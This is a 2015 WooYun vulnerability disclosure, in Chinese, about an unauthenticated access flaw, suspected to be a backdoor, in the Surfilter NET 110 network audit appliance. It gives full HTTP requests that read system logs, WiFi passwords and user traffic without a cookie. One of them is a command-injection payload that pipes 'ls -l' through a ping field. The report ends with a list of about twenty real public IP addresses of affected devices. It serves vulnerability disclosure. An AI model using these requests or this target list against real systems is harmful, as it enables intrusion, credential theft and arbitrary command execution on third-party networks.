乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-21: 细节已通知厂商并且等待厂商处理中 2015-03-26: 厂商已经确认,细节仅向厂商公开 2015-03-29: 细节向第三方安全合作伙伴开放 2015-05-20: 细节向核心白帽子及相关领域专家公开 2015-05-30: 细节向普通白帽子公开 2015-06-09: 细节向实习白帽子公开 2015-06-24: 细节向公众公开
可直接任意命令执行,可直接获取wifi密码,可直接获取内网连接信息,反正就是在不登录情况下能获取登录后所有系统信息。。
这个疑似“任子行”后门,为什么?一般系统登录会判断Cookie值,而Cookie一般会随登录随机变化或随密码固定不变。如果Cookie不正确会提示登录等等未授权信息或提示重新登录信息,但是“任子行”NET 110网络安全审计系统很奇怪,居然把Cookie整个值删除后再访问就能获取相关信息。奇葩吧!
日志信息:
获取wifi密码:
任意系统命令执行:
获取用户流量统计
获取系统日志GET /cgi-bin/web_cgi?module=sys_log&op_req=read_system&start=0&limit=100 HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://地址/Accept: application/json, text/javascript, */*; q=0.01If-Modified-Since: 0Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)Host: 地址Proxy-Connection: Keep-Alive获取wifi名称与密码GET /cgi-bin/web_cgi?key_val=1&module=wl_safe&op_req=read_by_id HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://地址/Accept: application/json, text/javascript, */*; q=0.01If-Modified-Since: 0Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)Host: 地址Proxy-Connection: Keep-AliveContent-Length: 2执行系统任意命令POST /cgi-bin/web_cgi HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://地址/Accept: application/json, text/javascript, */*; q=0.01If-Modified-Since: 0Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)Host: 地址Content-Length: 74Proxy-Connection: Keep-AlivePragma: no-cacheip_addr=127.0.0.1|ls -l&module=net_tool&op_req=read_system&sub_module=ping获取用户浏览统计GET /cgi-bin/web_cgi?module=user_traffic_total&op_req=read_system&scope=0&t_scope=2 HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://地址/Accept: application/json, text/javascript, */*; q=0.01If-Modified-Since: 0Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 3.0.04320; .NET CLR 2.0.50727)Host: 地址Proxy-Connection: Keep-AliveContent-Length: 2
反正所有功能都能获取,不一一举例了。。
案例:
http://219.150.20.218/login.htmlhttp://219.150.20.84/login.htmlhttp://219.150.20.249/login.htmlhttp://122.138.194.122/login.htmlhttp://218.62.109.138/login.htmlhttp://122.140.92.78/login.htmlhttp://122.143.116.206/login.htmlhttp://119.52.188.70/login.htmlhttp://122.143.188.194/login.htmlhttp://122.141.94.122/login.htmlhttp://58.245.209.182/login.htmlhttp://119.52.248.18/login.htmlhttp://58.244.248.54/login.htmlhttp://61.184.82.217/login.htmlhttp://122.140.90.18/login.htmlhttp://61.184.81.172/login.htmlhttp://61.136.65.158:81/login.htmlhttp://61.182.80.59/login.htmlhttp://218.29.210.226/login.htmlhttp://222.160.174.50/login.htmlhttp://221.11.33.70/login.html
联系厂商
危害等级:高
漏洞Rank:16
确认时间:2015-03-26 08:16
CNVD确认所述情况,同时厂商也在积极认领,已经转报厂商,厂商正积极处置.
暂无